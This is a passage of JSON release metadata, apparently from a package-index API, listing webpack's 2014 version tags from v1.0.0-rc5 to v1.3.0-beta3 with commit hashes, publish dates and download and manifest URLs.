k/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0